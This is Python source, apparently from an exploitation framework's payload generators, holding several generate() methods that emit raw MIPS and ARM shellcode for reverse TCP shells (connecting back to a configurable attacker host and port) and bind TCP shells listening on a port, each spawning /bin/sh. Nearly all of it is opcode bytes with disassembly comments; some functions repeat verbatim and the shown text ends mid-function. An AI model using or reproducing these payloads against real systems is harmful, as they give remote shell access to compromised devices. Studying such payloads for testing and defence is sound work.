def generate(self):
    """Build the MIPS little-endian reverse TCP shell payload.

    Opcode stream, in order: close(0), close(1), close(2); socket(2, 2, 0);
    two dup() calls so the socket and its copies occupy fds 0-2; connect()
    to a sockaddr_in assembled on the stack from ``self.lhost`` /
    ``self.lport``; execve("//bin/sh", ["//bin/sh", NULL], NULL).  Syscall
    numbers are MIPS o32 (4006 close, 4041 dup, 4170 connect, 4183 socket,
    4011 execve); every ``syscall`` carries code 0x42424, presumably to keep
    the instruction word free of NUL bytes.

    Returns:
        A str of raw little-endian opcode bytes.  ``validators.convert_ip`` /
        ``convert_port`` are project helpers not visible here — assumed to
        return the address as 4 and the port as 2 network-order bytes; the
        halves are spliced directly into lui/ori immediates below.
    """
    host_bytes = validators.convert_ip(self.lhost)
    port_bytes = validators.convert_port(self.lport)
    opcodes = (
        # close(0), close(1), close(2)
        "\xff\xff\x04\x28",  # slti a0,zero,-1
        "\xa6\x0f\x02\x24",  # li v0,4006
        "\x0c\x09\x09\x01",  # syscall 0x42424
        "\x11\x11\x04\x28",  # slti a0,zero,4369
        "\xa6\x0f\x02\x24",  # li v0,4006
        "\x0c\x09\x09\x01",  # syscall 0x42424
        "\xfd\xff\x0c\x24",  # li t4,-3
        "\x27\x20\x80\x01",  # nor a0,t4,zero
        "\xa6\x0f\x02\x24",  # li v0,4006
        "\x0c\x09\x09\x01",  # syscall 0x42424
        # socket(2, 2, 0)
        "\xfd\xff\x0c\x24",  # li t4,-3
        "\x27\x20\x80\x01",  # nor a0,t4,zero
        "\x27\x28\x80\x01",  # nor a1,t4,zero
        "\xff\xff\x06\x28",  # slti a2,zero,-1
        "\x57\x10\x02\x24",  # li v0,4183
        "\x0c\x09\x09\x01",  # syscall 0x42424
        # dup(sock) twice
        "\xff\xff\x44\x30",  # andi a0,v0,0xffff
        "\xc9\x0f\x02\x24",  # li v0,4041
        "\x0c\x09\x09\x01",  # syscall 0x42424
        "\xc9\x0f\x02\x24",  # li v0,4041
        "\x0c\x09\x09\x01",  # syscall 0x42424
        # sockaddr_in at -8(sp): {AF_INET, port} then the address word
        port_bytes + "\x05\x3c",  # lui a1,<port>   (sample "\x7a\x69" -> lui a1,0x697a)
        "\x02\x00\xa5\x34",  # ori a1,a1,0x2
        "\xf8\xff\xa5\xaf",  # sw a1,-8(sp)
        host_bytes[2:] + "\x05\x3c",  # lui a1,<ip[2:4]>   (sample "\x00\x01" -> lui a1,0x100)
        host_bytes[:2] + "\xa5\x34",  # ori a1,a1,<ip[0:2]>   (sample "\x7f\x00" -> ori a1,a1,0x7f)
        "\xfc\xff\xa5\xaf",  # sw a1,-4(sp)
        # connect(sock, &sockaddr, 16)
        "\xf8\xff\xa5\x23",  # addi a1,sp,-8
        "\xef\xff\x0c\x24",  # li t4,-17
        "\x27\x30\x80\x01",  # nor a2,t4,zero
        "\x4a\x10\x02\x24",  # li v0,4170
        "\x0c\x09\x09\x01",  # syscall 0x42424
        # "//bin/sh\0" at -20(sp), argv at -8(sp)
        "\x62\x69\x08\x3c",  # lui t0,0x6962
        "\x2f\x2f\x08\x35",  # ori t0,t0,0x2f2f
        "\xec\xff\xa8\xaf",  # sw t0,-20(sp)
        "\x73\x68\x08\x3c",  # lui t0,0x6873
        "\x6e\x2f\x08\x35",  # ori t0,t0,0x2f6e
        "\xf0\xff\xa8\xaf",  # sw t0,-16(sp)
        "\xff\xff\x07\x28",  # slti a3,zero,-1
        "\xf4\xff\xa7\xaf",  # sw a3,-12(sp)
        "\xfc\xff\xa7\xaf",  # sw a3,-4(sp)
        "\xec\xff\xa4\x23",  # addi a0,sp,-20
        "\xec\xff\xa8\x23",  # addi t0,sp,-20
        "\xf8\xff\xa8\xaf",  # sw t0,-8(sp)
        "\xf8\xff\xa5\x23",  # addi a1,sp,-8
        "\xec\xff\xbd\x27",  # addiu sp,sp,-20
        "\xff\xff\x06\x28",  # slti a2,zero,-1
        "\xab\x0f\x02\x24",  # li v0,4011
        "\x0c\x09\x09\x01",  # syscall 0x42424
    )
    return "".join(opcodes)
def generate(self):
    """Build the MIPS big-endian reverse TCP shell payload.

    Same call sequence as the little-endian variant: close(0..2);
    socket(2, 2, 0); dup() twice; connect() to a stack-built sockaddr_in
    from ``self.lhost`` / ``self.lport``; execve("//bin/sh",
    ["//bin/sh", NULL], NULL).  MIPS o32 syscall numbers (4006 close,
    4041 dup, 4170 connect, 4183 socket, 4011 execve).  The final
    ``syscall`` uses code 0x2424d rather than 0x42424 — different word,
    same instruction.

    Returns:
        A str of raw big-endian opcode bytes.  ``validators.convert_ip`` /
        ``convert_port`` are project helpers not visible here — assumed to
        return 4 and 2 network-order bytes; in big-endian the port and each
        address half drop straight into the low 16 bits of lui/ori.
    """
    host_bytes = validators.convert_ip(self.lhost)
    port_bytes = validators.convert_port(self.lport)
    opcodes = (
        # close(0), close(1), close(2)
        "\x28\x04\xff\xff",  # slti a0,zero,-1
        "\x24\x02\x0f\xa6",  # li v0,4006
        "\x01\x09\x09\x0c",  # syscall 0x42424
        "\x28\x04\x11\x11",  # slti a0,zero,4369
        "\x24\x02\x0f\xa6",  # li v0,4006
        "\x01\x09\x09\x0c",  # syscall 0x42424
        "\x24\x0c\xff\xfd",  # li t4,-3
        "\x01\x80\x20\x27",  # nor a0,t4,zero
        "\x24\x02\x0f\xa6",  # li v0,4006
        "\x01\x09\x09\x0c",  # syscall 0x42424
        # socket(2, 2, 0)
        "\x24\x0c\xff\xfd",  # li t4,-3
        "\x01\x80\x20\x27",  # nor a0,t4,zero
        "\x01\x80\x28\x27",  # nor a1,t4,zero
        "\x28\x06\xff\xff",  # slti a2,zero,-1
        "\x24\x02\x10\x57",  # li v0,4183
        "\x01\x09\x09\x0c",  # syscall 0x42424
        # dup(sock) twice
        "\x30\x44\xff\xff",  # andi a0,v0,0xffff
        "\x24\x02\x0f\xc9",  # li v0,4041
        "\x01\x09\x09\x0c",  # syscall 0x42424
        "\x24\x02\x0f\xc9",  # li v0,4041
        "\x01\x09\x09\x0c",  # syscall 0x42424
        # sockaddr_in at -8(sp): {AF_INET, port} then the address word
        "\x3c\x05\x00\x02",  # lui a1,0x2
        "\x34\xa5" + port_bytes,  # ori a1,a1,<port>   (sample "\x7a\x69" -> ori a1,a1,0x7a69)
        "\xaf\xa5\xff\xf8",  # sw a1,-8(sp)
        "\x3c\x05" + host_bytes[:2],  # lui a1,<ip[0:2]>   (sample "\xc0\xa8" -> lui a1,0xc0a8)
        "\x34\xa5" + host_bytes[2:],  # ori a1,a1,<ip[2:4]>   (sample "\x01\x37" -> ori a1,a1,0x137)
        "\xaf\xa5\xff\xfc",  # sw a1,-4(sp)
        # connect(sock, &sockaddr, 16)
        "\x23\xa5\xff\xf8",  # addi a1,sp,-8
        "\x24\x0c\xff\xef",  # li t4,-17
        "\x01\x80\x30\x27",  # nor a2,t4,zero
        "\x24\x02\x10\x4a",  # li v0,4170
        "\x01\x09\x09\x0c",  # syscall 0x42424
        # "//bin/sh\0" at -20(sp), argv at -8(sp)
        "\x3c\x08\x2f\x2f",  # lui t0,0x2f2f
        "\x35\x08\x62\x69",  # ori t0,t0,0x6269
        "\xaf\xa8\xff\xec",  # sw t0,-20(sp)
        "\x3c\x08\x6e\x2f",  # lui t0,0x6e2f
        "\x35\x08\x73\x68",  # ori t0,t0,0x7368
        "\xaf\xa8\xff\xf0",  # sw t0,-16(sp)
        "\x28\x07\xff\xff",  # slti a3,zero,-1
        "\xaf\xa7\xff\xf4",  # sw a3,-12(sp)
        "\xaf\xa7\xff\xfc",  # sw a3,-4(sp)
        "\x23\xa4\xff\xec",  # addi a0,sp,-20
        "\x23\xa8\xff\xec",  # addi t0,sp,-20
        "\xaf\xa8\xff\xf8",  # sw t0,-8(sp)
        "\x23\xa5\xff\xf8",  # addi a1,sp,-8
        "\x27\xbd\xff\xec",  # addiu sp,sp,-20
        "\x28\x06\xff\xff",  # slti a2,zero,-1
        "\x24\x02\x0f\xab",  # li v0,4011
        "\x00\x90\x93\x4c",  # syscall 0x2424d
    )
    return "".join(opcodes)
def generate(self):
    """Build the MIPS big-endian reverse TCP shell payload.

    Call sequence: close(0..2); socket(2, 2, 0); dup() twice; connect() to a
    stack-built sockaddr_in from ``self.lhost`` / ``self.lport``;
    execve("//bin/sh", ["//bin/sh", NULL], NULL).  MIPS o32 syscall numbers
    (4006 close, 4041 dup, 4170 connect, 4183 socket, 4011 execve).  The
    final ``syscall`` carries code 0x2424d instead of 0x42424 — a different
    word encoding the same instruction.

    Returns:
        A str of raw big-endian opcode bytes.  ``validators.convert_ip`` /
        ``convert_port`` are project helpers not visible here — assumed to
        return 4 and 2 network-order bytes that are appended as the low 16
        bits of the lui/ori instructions below.
    """
    host_bytes = validators.convert_ip(self.lhost)
    port_bytes = validators.convert_port(self.lport)
    opcodes = (
        # close(0), close(1), close(2)
        "\x28\x04\xff\xff",  # slti a0,zero,-1
        "\x24\x02\x0f\xa6",  # li v0,4006
        "\x01\x09\x09\x0c",  # syscall 0x42424
        "\x28\x04\x11\x11",  # slti a0,zero,4369
        "\x24\x02\x0f\xa6",  # li v0,4006
        "\x01\x09\x09\x0c",  # syscall 0x42424
        "\x24\x0c\xff\xfd",  # li t4,-3
        "\x01\x80\x20\x27",  # nor a0,t4,zero
        "\x24\x02\x0f\xa6",  # li v0,4006
        "\x01\x09\x09\x0c",  # syscall 0x42424
        # socket(2, 2, 0)
        "\x24\x0c\xff\xfd",  # li t4,-3
        "\x01\x80\x20\x27",  # nor a0,t4,zero
        "\x01\x80\x28\x27",  # nor a1,t4,zero
        "\x28\x06\xff\xff",  # slti a2,zero,-1
        "\x24\x02\x10\x57",  # li v0,4183
        "\x01\x09\x09\x0c",  # syscall 0x42424
        # dup(sock) twice
        "\x30\x44\xff\xff",  # andi a0,v0,0xffff
        "\x24\x02\x0f\xc9",  # li v0,4041
        "\x01\x09\x09\x0c",  # syscall 0x42424
        "\x24\x02\x0f\xc9",  # li v0,4041
        "\x01\x09\x09\x0c",  # syscall 0x42424
        # sockaddr_in at -8(sp): {AF_INET, port} then the address word
        "\x3c\x05\x00\x02",  # lui a1,0x2
        "\x34\xa5" + port_bytes,  # ori a1,a1,<port>   (sample "\x7a\x69" -> ori a1,a1,0x7a69)
        "\xaf\xa5\xff\xf8",  # sw a1,-8(sp)
        "\x3c\x05" + host_bytes[:2],  # lui a1,<ip[0:2]>   (sample "\xc0\xa8" -> lui a1,0xc0a8)
        "\x34\xa5" + host_bytes[2:],  # ori a1,a1,<ip[2:4]>   (sample "\x01\x37" -> ori a1,a1,0x137)
        "\xaf\xa5\xff\xfc",  # sw a1,-4(sp)
        # connect(sock, &sockaddr, 16)
        "\x23\xa5\xff\xf8",  # addi a1,sp,-8
        "\x24\x0c\xff\xef",  # li t4,-17
        "\x01\x80\x30\x27",  # nor a2,t4,zero
        "\x24\x02\x10\x4a",  # li v0,4170
        "\x01\x09\x09\x0c",  # syscall 0x42424
        # "//bin/sh\0" at -20(sp), argv at -8(sp)
        "\x3c\x08\x2f\x2f",  # lui t0,0x2f2f
        "\x35\x08\x62\x69",  # ori t0,t0,0x6269
        "\xaf\xa8\xff\xec",  # sw t0,-20(sp)
        "\x3c\x08\x6e\x2f",  # lui t0,0x6e2f
        "\x35\x08\x73\x68",  # ori t0,t0,0x7368
        "\xaf\xa8\xff\xf0",  # sw t0,-16(sp)
        "\x28\x07\xff\xff",  # slti a3,zero,-1
        "\xaf\xa7\xff\xf4",  # sw a3,-12(sp)
        "\xaf\xa7\xff\xfc",  # sw a3,-4(sp)
        "\x23\xa4\xff\xec",  # addi a0,sp,-20
        "\x23\xa8\xff\xec",  # addi t0,sp,-20
        "\xaf\xa8\xff\xf8",  # sw t0,-8(sp)
        "\x23\xa5\xff\xf8",  # addi a1,sp,-8
        "\x27\xbd\xff\xec",  # addiu sp,sp,-20
        "\x28\x06\xff\xff",  # slti a2,zero,-1
        "\x24\x02\x0f\xab",  # li v0,4011
        "\x00\x90\x93\x4c",  # syscall 0x2424d
    )
    return "".join(opcodes)
def generate(self):
    """Build the MIPS little-endian reverse TCP shell payload.

    Opcode stream, in order: close(0), close(1), close(2); socket(2, 2, 0);
    two dup() calls so the socket and its copies occupy fds 0-2; connect()
    to a sockaddr_in assembled on the stack from ``self.lhost`` /
    ``self.lport``; execve("//bin/sh", ["//bin/sh", NULL], NULL).  Syscall
    numbers are MIPS o32 (4006 close, 4041 dup, 4170 connect, 4183 socket,
    4011 execve); every ``syscall`` carries code 0x42424, presumably to keep
    the instruction word free of NUL bytes.

    Returns:
        A str of raw little-endian opcode bytes.  ``validators.convert_ip`` /
        ``convert_port`` are project helpers not visible here — assumed to
        return the address as 4 and the port as 2 network-order bytes; the
        halves are spliced directly into lui/ori immediates below.
    """
    host_bytes = validators.convert_ip(self.lhost)
    port_bytes = validators.convert_port(self.lport)
    opcodes = (
        # close(0), close(1), close(2)
        "\xff\xff\x04\x28",  # slti a0,zero,-1
        "\xa6\x0f\x02\x24",  # li v0,4006
        "\x0c\x09\x09\x01",  # syscall 0x42424
        "\x11\x11\x04\x28",  # slti a0,zero,4369
        "\xa6\x0f\x02\x24",  # li v0,4006
        "\x0c\x09\x09\x01",  # syscall 0x42424
        "\xfd\xff\x0c\x24",  # li t4,-3
        "\x27\x20\x80\x01",  # nor a0,t4,zero
        "\xa6\x0f\x02\x24",  # li v0,4006
        "\x0c\x09\x09\x01",  # syscall 0x42424
        # socket(2, 2, 0)
        "\xfd\xff\x0c\x24",  # li t4,-3
        "\x27\x20\x80\x01",  # nor a0,t4,zero
        "\x27\x28\x80\x01",  # nor a1,t4,zero
        "\xff\xff\x06\x28",  # slti a2,zero,-1
        "\x57\x10\x02\x24",  # li v0,4183
        "\x0c\x09\x09\x01",  # syscall 0x42424
        # dup(sock) twice
        "\xff\xff\x44\x30",  # andi a0,v0,0xffff
        "\xc9\x0f\x02\x24",  # li v0,4041
        "\x0c\x09\x09\x01",  # syscall 0x42424
        "\xc9\x0f\x02\x24",  # li v0,4041
        "\x0c\x09\x09\x01",  # syscall 0x42424
        # sockaddr_in at -8(sp): {AF_INET, port} then the address word
        port_bytes + "\x05\x3c",  # lui a1,<port>   (sample "\x7a\x69" -> lui a1,0x697a)
        "\x02\x00\xa5\x34",  # ori a1,a1,0x2
        "\xf8\xff\xa5\xaf",  # sw a1,-8(sp)
        host_bytes[2:] + "\x05\x3c",  # lui a1,<ip[2:4]>   (sample "\x00\x01" -> lui a1,0x100)
        host_bytes[:2] + "\xa5\x34",  # ori a1,a1,<ip[0:2]>   (sample "\x7f\x00" -> ori a1,a1,0x7f)
        "\xfc\xff\xa5\xaf",  # sw a1,-4(sp)
        # connect(sock, &sockaddr, 16)
        "\xf8\xff\xa5\x23",  # addi a1,sp,-8
        "\xef\xff\x0c\x24",  # li t4,-17
        "\x27\x30\x80\x01",  # nor a2,t4,zero
        "\x4a\x10\x02\x24",  # li v0,4170
        "\x0c\x09\x09\x01",  # syscall 0x42424
        # "//bin/sh\0" at -20(sp), argv at -8(sp)
        "\x62\x69\x08\x3c",  # lui t0,0x6962
        "\x2f\x2f\x08\x35",  # ori t0,t0,0x2f2f
        "\xec\xff\xa8\xaf",  # sw t0,-20(sp)
        "\x73\x68\x08\x3c",  # lui t0,0x6873
        "\x6e\x2f\x08\x35",  # ori t0,t0,0x2f6e
        "\xf0\xff\xa8\xaf",  # sw t0,-16(sp)
        "\xff\xff\x07\x28",  # slti a3,zero,-1
        "\xf4\xff\xa7\xaf",  # sw a3,-12(sp)
        "\xfc\xff\xa7\xaf",  # sw a3,-4(sp)
        "\xec\xff\xa4\x23",  # addi a0,sp,-20
        "\xec\xff\xa8\x23",  # addi t0,sp,-20
        "\xf8\xff\xa8\xaf",  # sw t0,-8(sp)
        "\xf8\xff\xa5\x23",  # addi a1,sp,-8
        "\xec\xff\xbd\x27",  # addiu sp,sp,-20
        "\xff\xff\x06\x28",  # slti a2,zero,-1
        "\xab\x0f\x02\x24",  # li v0,4011
        "\x0c\x09\x09\x01",  # syscall 0x42424
    )
    return "".join(opcodes)
def generate(self):
    """Build the ARM (little-endian) reverse TCP shell payload.

    The first two words switch the core to Thumb; the remaining Thumb code
    does socket / connect / a dup2 loop / execve via ``svc 1`` with the
    syscall number in r7.  The opcodes are followed by data that the code
    addresses PC-relative: a sockaddr_in (AF_INET = 0x0002, then the port
    and address from ``self.lhost`` / ``self.lport``) and the NUL-terminated
    path "/bin/sh".

    Returns:
        A str of raw opcode + data bytes.  ``validators.convert_ip`` /
        ``convert_port`` are project helpers not visible here — assumed to
        return 4 and 2 network-order bytes, which is what sockaddr_in needs.
    """
    host_bytes = validators.convert_ip(self.lhost)
    port_bytes = validators.convert_port(self.lport)
    code = (
        "\x01\x10\x8F\xE2",  # add r1,pc,#1
        "\x11\xFF\x2F\xE1",  # bx r1 -> Thumb mode from here on
        "\x02\x20\x01\x21",  # movs r0,#2 ; movs r1,#1
        "\x92\x1A\x0F\x02",  # subs r2,r2,r2 ; lsls r7,r1,#8
        "\x19\x37\x01\xDF",  # adds r7,#25 (281 = socket) ; svc 1
        "\x06\x1C\x08\xA1",  # mov r6,r0 ; add r1,pc,#32 (-> sockaddr below)
        "\x10\x22\x02\x37",  # movs r2,#16 ; adds r7,#2 (283 = connect)
        "\x01\xDF\x3F\x27",  # svc 1 ; movs r7,#63 (dup2)
        "\x02\x21\x30\x1c",  # movs r1,#2 ; mov r0,r6
        "\x01\xdf\x01\x39",  # svc 1 ; subs r1,#1
        "\xFB\xD5\x05\xA0",  # bpl (dup2 loop) ; add r0,pc,#20 (-> "/bin/sh")
        "\x92\x1a\x05\xb4",  # subs r2,r2,r2 ; push {r0,r2}
        "\x69\x46\x0b\x27",  # mov r1,sp ; movs r7,#11 (execve)
        "\x01\xDF\xC0\x46",  # svc 1 ; nop
    )
    data = (
        "\x02\x00" + port_bytes,  # struct sockaddr: AF_INET and port (sample "\x12\x34")
        host_bytes,  # reverse ip address
        "\x2f\x62\x69\x6e",  # /bin
        "\x2f\x73\x68\x00",  # /sh\0
    )
    return "".join(code) + "".join(data)
def generate(self):
    """Build the ARM (little-endian, ARM-mode) bind TCP shell payload.

    Uses the OABI trap encoding ``svc 0x900000+NR``: 0x900066 is
    socketcall (sub-ops 1 socket, 2 bind, 4 listen, 5 accept, each with its
    argument block pushed on the stack), 0x90003f dup2 and 0x90000b execve.
    The listening port from ``self.rport`` is injected one byte at a time
    into two ``mov`` immediates and recombined into the sockaddr_in word;
    the "/bin/sh" string is materialised in registers and pushed before
    execve.

    Returns:
        A str of raw opcode bytes.  ``validators.convert_port`` is a project
        helper not visible here — assumed to return 2 network-order bytes,
        since element [1] becomes the low and element [0] the high port byte.
    """
    port_bytes = validators.convert_port(self.rport)
    opcodes = (
        # socketcall(SYS_SOCKET, {2, 1, 6})
        "\x02\x00\xa0\xe3",  # mov r0,#2
        "\x01\x10\xa0\xe3",  # mov r1,#1
        "\x06\x20\xa0\xe3",  # mov r2,#6
        "\x07\x00\x2d\xe9",  # push {r0,r1,r2}
        "\x01\x00\xa0\xe3",  # mov r0,#1
        "\x0d\x10\xa0\xe1",  # mov r1,sp
        "\x66\x00\x90\xef",  # svc 0x900066
        "\x0c\xd0\x8d\xe2",  # add sp,sp,#12
        "\x00\x60\xa0\xe1",  # mov r6,r0 (socket fd)
        # sockaddr_in word: port bytes shifted in, AF_INET in the low half
        port_bytes[1] + "\x10\xa0\xe3",  # mov r1,#<port[1]>
        port_bytes[0] + "\x70\xa0\xe3",  # mov r7,#<port[0]>
        "\x01\x1c\xa0\xe1",  # lsl r1,r1,#24
        "\x07\x18\x81\xe0",  # add r1,r1,r7,lsl #16
        "\x02\x10\x81\xe2",  # add r1,r1,#2
        "\x02\x20\x42\xe0",  # sub r2,r2,r2
        "\x06\x00\x2d\xe9",  # push {r1,r2}
        # socketcall(SYS_BIND, {fd, &sockaddr, 16})
        "\x0d\x10\xa0\xe1",  # mov r1,sp
        "\x10\x20\xa0\xe3",  # mov r2,#16
        "\x07\x00\x2d\xe9",  # push {r0,r1,r2}
        "\x02\x00\xa0\xe3",  # mov r0,#2
        "\x0d\x10\xa0\xe1",  # mov r1,sp
        "\x66\x00\x90\xef",  # svc 0x900066
        "\x14\xd0\x8d\xe2",  # add sp,sp,#20
        # socketcall(SYS_LISTEN, {fd, backlog})
        "\x06\x00\xa0\xe1",  # mov r0,r6
        "\x03\x00\x2d\xe9",  # push {r0,r1}
        "\x04\x00\xa0\xe3",  # mov r0,#4
        "\x0d\x10\xa0\xe1",  # mov r1,sp
        "\x66\x00\x90\xef",  # svc 0x900066
        "\x08\xd0\x8d\xe2",  # add sp,sp,#8
        # socketcall(SYS_ACCEPT, {fd, 0, 0})
        "\x06\x00\xa0\xe1",  # mov r0,r6
        "\x01\x10\x41\xe0",  # sub r1,r1,r1
        "\x02\x20\x42\xe0",  # sub r2,r2,r2
        "\x07\x00\x2d\xe9",  # push {r0,r1,r2}
        "\x05\x00\xa0\xe3",  # mov r0,#5
        "\x0d\x10\xa0\xe1",  # mov r1,sp
        "\x66\x00\x90\xef",  # svc 0x900066
        "\x0c\xd0\x8d\xe2",  # add sp,sp,#12
        "\x00\x60\xa0\xe1",  # mov r6,r0 (accepted fd)
        # dup2(fd, 2..0)
        "\x02\x10\xa0\xe3",  # mov r1,#2
        "\x06\x00\xa0\xe1",  # mov r0,r6
        "\x3f\x00\x90\xef",  # svc 0x90003f
        "\x01\x10\x51\xe2",  # subs r1,r1,#1
        "\xfb\xff\xff\x5a",  # bpl (back to mov r0,r6)
        # execve("/bin/sh", ["/bin/sh", NULL], NULL)
        "\x04\x10\x4d\xe2",  # sub r1,sp,#4
        "\x02\x20\x42\xe0",  # sub r2,r2,r2
        "\x2f\x30\xa0\xe3",  # mov r3,#0x2f  '/'
        "\x62\x70\xa0\xe3",  # mov r7,#0x62  'b'
        "\x07\x34\x83\xe0",  # add r3,r3,r7,lsl #8
        "\x69\x70\xa0\xe3",  # mov r7,#0x69  'i'
        "\x07\x38\x83\xe0",  # add r3,r3,r7,lsl #16
        "\x6e\x70\xa0\xe3",  # mov r7,#0x6e  'n'
        "\x07\x3c\x83\xe0",  # add r3,r3,r7,lsl #24
        "\x2f\x40\xa0\xe3",  # mov r4,#0x2f  '/'
        "\x73\x70\xa0\xe3",  # mov r7,#0x73  's'
        "\x07\x44\x84\xe0",  # add r4,r4,r7,lsl #8
        "\x68\x70\xa0\xe3",  # mov r7,#0x68  'h'
        "\x07\x48\x84\xe0",  # add r4,r4,r7,lsl #16
        "\x73\x50\xa0\xe3",  # mov r5,#0x73
        "\x68\x70\xa0\xe3",  # mov r7,#0x68
        "\x07\x54\x85\xe0",  # add r5,r5,r7,lsl #8
        "\x3e\x00\x2d\xe9",  # push {r1,r2,r3,r4,r5}
        "\x08\x00\x8d\xe2",  # add r0,sp,#8
        "\x00\x10\x8d\xe2",  # add r1,sp,#0
        "\x04\x20\x8d\xe2",  # add r2,sp,#4
        "\x0b\x00\x90\xef",  # svc 0x90000b
    )
    return "".join(opcodes)
def generate(self):
    """Build the MIPS little-endian bind TCP shell payload (port: ``self.lport``).

    Call sequence, with MIPS o32 syscall numbers: socket(2, 2, 0) [4183];
    bind(s, {AF_INET, port, INADDR_ANY}, 16) [4169]; listen(s, 257) [4174];
    accept(s, NULL, NULL) [4168]; dup2(client, 2..0) in a loop [4063];
    execve("//bin/sh", ["//bin/sh", NULL], NULL) [4011].  The accepted fd is
    parked at -1(sp), an unaligned word slot — NOTE(review): relies on the
    kernel handling unaligned sw/lw; confirm for the target.

    Returns:
        A str of raw little-endian opcode bytes.  ``validators.convert_port``
        is a project helper not visible here — assumed to return 2
        network-order bytes, which land as the little-endian immediate of
        ``li t5`` and are shifted into the high half of the sockaddr word.
    """
    port_bytes = validators.convert_port(self.lport)
    opcodes = (
        # socket(PF_INET, SOCK_STREAM, 0)
        "\xe0\xff\xbd\x27",  # addiu sp,sp,-32
        "\xfd\xff\x0e\x24",  # li t6,-3
        "\x27\x20\xc0\x01",  # nor a0,t6,zero
        "\x27\x28\xc0\x01",  # nor a1,t6,zero
        "\xff\xff\x06\x28",  # slti a2,zero,-1
        "\x57\x10\x02\x24",  # li v0,4183 ( __NR_socket )
        "\x0c\x01\x01\x01",  # syscall
        # sockaddr_in at -32(sp): {AF_INET, port, 0.0.0.0, pad}
        "\xff\xff\x50\x30",  # andi s0,v0,0xffff
        "\xef\xff\x0e\x24",  # li t6,-17 ; t6: 0xffffffef
        "\x27\x70\xc0\x01",  # nor t6,t6,zero ; t6: 0x10 (16)
        port_bytes + "\x0d\x24",  # li t5,<port> ; sample: 0x5c11 (0x115c == 4444, default LPORT)
        "\x04\x68\xcd\x01",  # sllv t5,t5,t6 ; t5: 0x5c110000
        "\xfd\xff\x0e\x24",  # li t6,-3 ; t6: -3
        "\x27\x70\xc0\x01",  # nor t6,t6,zero ; t6: 0x2
        "\x25\x68\xae\x01",  # or t5,t5,t6 ; t5: 0x5c110002
        "\xe0\xff\xad\xaf",  # sw t5,-32(sp)
        "\xe4\xff\xa0\xaf",  # sw zero,-28(sp)
        "\xe8\xff\xa0\xaf",  # sw zero,-24(sp)
        "\xec\xff\xa0\xaf",  # sw zero,-20(sp)
        # bind(s, &sockaddr, 16)
        "\x25\x20\x10\x02",  # or a0,s0,s0
        "\xef\xff\x0e\x24",  # li t6,-17
        "\x27\x30\xc0\x01",  # nor a2,t6,zero
        "\xe0\xff\xa5\x23",  # addi a1,sp,-32
        "\x49\x10\x02\x24",  # li v0,4169 ( __NR_bind )
        "\x0c\x01\x01\x01",  # syscall
        # listen(s, 257)
        "\x25\x20\x10\x02",  # or a0,s0,s0
        "\x01\x01\x05\x24",  # li a1,257
        "\x4e\x10\x02\x24",  # li v0,4174 ( __NR_listen )
        "\x0c\x01\x01\x01",  # syscall
        # accept(s, NULL, NULL)
        "\x25\x20\x10\x02",  # or a0,s0,s0
        "\xff\xff\x05\x28",  # slti a1,zero,-1
        "\xff\xff\x06\x28",  # slti a2,zero,-1
        "\x48\x10\x02\x24",  # li v0,4168 ( __NR_accept )
        "\x0c\x01\x01\x01",  # syscall
        # dup2(client, 2), dup2(client, 1), dup2(client, 0)
        "\xff\xff\xa2\xaf",  # sw v0,-1(sp) # socket
        "\xfd\xff\x11\x24",  # li s1,-3
        "\x27\x88\x20\x02",  # nor s1,s1,zero
        "\xff\xff\xa4\x8f",  # lw a0,-1(sp)
        "\x21\x28\x20\x02",  # move a1,s1 # dup2_loop
        "\xdf\x0f\x02\x24",  # li v0,4063 ( __NR_dup2 )
        "\x0c\x01\x01\x01",  # syscall 0x40404
        "\xff\xff\x10\x24",  # li s0,-1
        "\xff\xff\x31\x22",  # addi s1,s1,-1
        "\xfa\xff\x30\x16",  # bne s1,s0 <dup2_loop>
        # execve("//bin/sh", ["//bin/sh", NULL], NULL)
        "\xff\xff\x06\x28",  # slti a2,zero,-1
        "\x62\x69\x0f\x3c",  # lui t7,0x6962 "bi"
        "\x2f\x2f\xef\x35",  # ori t7,t7,0x2f2f "//"
        "\xec\xff\xaf\xaf",  # sw t7,-20(sp)
        "\x73\x68\x0e\x3c",  # lui t6,0x7368 "sh"
        "\x6e\x2f\xce\x35",  # ori t6,t6,0x2f6e "n/"
        "\xf0\xff\xae\xaf",  # sw t6,-16(sp)
        "\xf4\xff\xa0\xaf",  # sw zero,-12(sp)
        "\xec\xff\xa4\x27",  # addiu a0,sp,-20
        "\xf8\xff\xa4\xaf",  # sw a0,-8(sp)
        "\xfc\xff\xa0\xaf",  # sw zero,-4(sp)
        "\xf8\xff\xa5\x27",  # addiu a1,sp,-8
        "\xab\x0f\x02\x24",  # li v0,4011 ( __NR_execve )
        "\x0c\x01\x01\x01",  # syscall 0x40404
    )
    return "".join(opcodes)
def generate(self):
    """Build the MIPS little-endian bind TCP shell payload (port: ``self.rport``).

    Call sequence, with MIPS o32 syscall numbers: socket(2, 2, 0) [4183];
    bind(s, {AF_INET, port, INADDR_ANY}, 16) [4169]; listen(s, 257) [4174];
    accept(s, NULL, NULL) [4168]; dup2(client, 2..0) in a loop [4063];
    execve("//bin/sh", ["//bin/sh", NULL], NULL) [4011].  The accepted fd is
    parked at -1(sp), an unaligned word slot — NOTE(review): relies on the
    kernel handling unaligned sw/lw; confirm for the target.

    Returns:
        A str of raw little-endian opcode bytes.  ``validators.convert_port``
        is a project helper not visible here — assumed to return 2
        network-order bytes, which land as the little-endian immediate of
        ``li t5`` and are shifted into the high half of the sockaddr word.
    """
    port_bytes = validators.convert_port(self.rport)
    opcodes = (
        # socket(PF_INET, SOCK_STREAM, 0)
        "\xe0\xff\xbd\x27",  # addiu sp,sp,-32
        "\xfd\xff\x0e\x24",  # li t6,-3
        "\x27\x20\xc0\x01",  # nor a0,t6,zero
        "\x27\x28\xc0\x01",  # nor a1,t6,zero
        "\xff\xff\x06\x28",  # slti a2,zero,-1
        "\x57\x10\x02\x24",  # li v0,4183 ( __NR_socket )
        "\x0c\x01\x01\x01",  # syscall
        # sockaddr_in at -32(sp): {AF_INET, port, 0.0.0.0, pad}
        "\xff\xff\x50\x30",  # andi s0,v0,0xffff
        "\xef\xff\x0e\x24",  # li t6,-17 ; t6: 0xffffffef
        "\x27\x70\xc0\x01",  # nor t6,t6,zero ; t6: 0x10 (16)
        port_bytes + "\x0d\x24",  # li t5,<port> ; sample: 0x5c11 (0x115c == 4444, default LPORT)
        "\x04\x68\xcd\x01",  # sllv t5,t5,t6 ; t5: 0x5c110000
        "\xfd\xff\x0e\x24",  # li t6,-3 ; t6: -3
        "\x27\x70\xc0\x01",  # nor t6,t6,zero ; t6: 0x2
        "\x25\x68\xae\x01",  # or t5,t5,t6 ; t5: 0x5c110002
